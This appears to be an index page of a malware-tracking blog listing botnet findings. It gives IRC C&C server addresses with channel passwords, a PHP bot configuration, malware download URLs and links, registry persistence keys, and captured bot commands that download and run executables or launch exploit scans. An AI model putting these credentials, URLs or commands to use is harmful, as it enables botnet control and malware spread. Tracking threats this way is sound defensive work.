Author: Pig

204.188.198.116(PHP Bot)

Uncategorized

var $config = array(“server”=>”204.188.198.116”, “port”=>6667, “pass”=>”p0015123”, //senha do server “prefix”=>”DosNet|”, “maxrand”=>8, “chan”=>”#php#”, “key”=>””, //senha do canal “modes”=>”+p”, “password”=>”p0015123”, //senha do bot “trigger”=>”.”, “hostauth”=>”*” // * for any hostname

bnsettings.com(kbot)

Uncategorized

Host Name IP Address bnsettings.com bnsettings.com 91.212.124.35 Download URLs http://91.218.229.143/ (91.218.229.143) http://91.218.229.143/ (91.218.229.143) http://74.53.182.127/ (74.53.182.127) http://74.53.28.130/ (74.53.28.130) http://91.218.229.143/ (91.218.229.143) http://74.53.182.127/ (74.53.182.127) http://74.53.28.130/ (74.53.28.130) http://74.53.28.131/ (74.53.28.131) http://74.53.182.127/ (74.53.182.127) http://74.53.28.130/ (74.53.28.130) http://74.53.28.131/ (74.53.28.131) http://74.53.182.127/ (74.53.182.127) http://74.53.28.130/ (74.53.28.130) http://74.53.28.131/ (74.53.28.131) http://74.53.182.127/ (74.53.182.127) http://74.53.28.130/ (74.53.28.130) http://74.53.28.131/ (74.53.28.131) http://74.53.182.127/ (74.53.182.127) http://74.53.28.130/ (74.53.28.130) http://74.53.28.131/ (74.53.28.131) http://74.53.182.127/ (74.53.182.127) http://74.53.28.130/ (74.53.28.130) http://74.53.28.131/ (74.53.28.131)Read more...

14 mb malware files

Uncategorized

here u can download and analyse your self around 14 mb exe files from diferent malwares Download: http://0dc07835.thesegalleries.com Download: http://3533e7ca.seriousfiles.com

213.46.47.24

Uncategorized

DNS Lookup Host Name IP Address 41.223.57.74 41.223.57.74 189.15.169.8 189.15.169.8 110.164.132.173 110.164.132.173 124.121.252.251 124.121.252.251 85.65.114.130 85.65.114.130 78.84.61.144 78.84.61.144 213.46.47.24 213.46.47.24 92.36.133.91 92.36.133.91 125.166.238.78 125.166.238.78 213.222.182.79 213.222.182.79 213.238.78.146 213.238.78.146 109.122.73.66 109.122.73.66 109.110.2.245 109.110.2.245 115.240.75.183 115.240.75.183 84.72.52.118 84.72.52.118 77.239.10.86 77.239.10.86 82.45.76.46 82.45.76.46 123.0.41.218 123.0.41.218 201.134.68.250 201.134.68.250 200.84.103.163 200.84.103.163 119.235.85.79 119.235.85.79 208.81.160.62 208.81.160.62 85.187.247.18 85.187.247.18 115.87.108.87 115.87.108.87 119.235.79.82Read more...

bbg.moiservice.com

Uncategorized

bbg.moiservice.com 74.117.174.82 i3ED6DA76.versanet.de 62.214.218.118 Opened listening TCP connection on port: 55907 Opened listening TCP connection on port: 113 C&C Server: 74.117.174.82:16667 Server Password: Username: laMer Nickname: XP|Ubd2 Channel: #lbl# (Password: lam) Channeltopic: : Username: icbx Nickname: [DEU]XP-SP3[00]6455 Channel: #l# (Password: lam) Channeltopic: :.asc asn445 50 3 120 -r -b -s Registry Changes by all processesRead more...

us.unicatz.com

Uncategorized

us.unicatz.com 74.117.174.82 C&C Server: 74.117.174.82:2010 Server Password: Username: okcbisjs Nickname: okcbisjs Channel: #us# (Password: d0s) Channeltopic: : Now talking in #us# Topic On: [ #us# ] [ .msn.addcontact wingate32.exe wingate32.zip wingate32.rar estas foto son toyo? estas foto son toyo? ] Topic By: [ dgdg ] (dgdg) .l huh (dgdg) .down http://attacke.100free.com/inanaged.exe c:inanaged.exe 1 Registry ChangesRead more...

minerva.cdmon.org

Uncategorized

minerva.cdmon.org 184.106.215.31 C&C Server: 184.106.215.31:6667 Server Password: Username: DELL-D3E62F7E26 Nickname: {XPDEU503896} Channel: ##key## (Password: moneylover) Channeltopic: : Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Windows Update” = C:DOKUME~1ADMINI~1LOKALE~1Tempservice.exe HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Windows Services” = service.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Windows Update” = C:DOKUME~1ADMINI~1LOKALE~1Tempservice.exe Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS” HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey” HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext” HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsRead more...

bunker.org.ua

Uncategorized

DNS Lookup Host Name IP Address direct.ips.co.jp 202.218.13.230 loja.tray.com.br 201.20.35.20 www.imusica.com.br 201.49.212.100 www.digimer.com.br 187.17.83.154 www.kajima.co.jp 203.180.140.61 www.ristex.jp 222.146.58.38 m-repo.lib.meiji.ac.jp 133.26.200.10 www.science-forum.co.jp 202.191.113.9 bunker.org.ua 195.214.214.53 opens www.iknow.co.jp 184.72.216.126 secure.fox shop.poziti rastu.com.ua Outgoing connection to remote server: 208.110.80.34 TCP port 443 Outgoing connection to remote server: direct.ips.co.jp TCP port 443 Outgoing connection to remote server: loja.tray.com.br TCPRead more...

tiffall.com

Uncategorized

tiffall.com 188.65.73.165 Download URLs http://188.65.73.165/nconfirm.php?rev=295&code=3&param=0&num=18212908502016 (tiffall.com) Outgoing connection to remote server: tiffall.com TCP port 80DNS Lookup Host Name IP Address tiffall.com tiffall.com 188.65.73.165 ridgear.com ridgear.com 76.73.68.114 Download URLs http://188.65.73.165/njob.php?num=10277514037544684544&rev=295 (tiffall.com) http://188.65.73.165/nconfirm.php?rev=295&code=7&param=0&num=18212908502016 (tiffall.com) http://188.65.73.165/nconfirm.php?rev=295&code=8&param=0&num=18212908502016 (tiffall.com) http://76.73.68.114/up/new123/netprotocol.exe (ridgear.com) Outgoing connection to remote server: tiffall.com TCP port 80 Outgoing connection to remote server: ridgear.com TCP port 80DNS LookupRead more...

ms4oov.twoplayers.net

Uncategorized

ms4oov.twoplayers.net 98.126.214.82 Remote Host Port Number 112.78.112.208 80 218.85.133.201 80 98.126.214.82 6789 PASS laorosr MODE #! -ix MODE #Ma -ix USER SP2-650 * 0 :COMPUTERNAME MODE [N00_USA_XP_9718720] @ -ix MODE #dpi -ix Joins channel: :#! #! :.asc​-S|.http​ http://​208.53.1​83.217/u​se13.exe​|.asc ex​p_all 30​ 5 0 -a-​r -e|.as​c exp_al​l 30 5 0​ -b -r-e​|.asc ex​p_all30 ​5 0 -b|.​asc exp_​allRead more...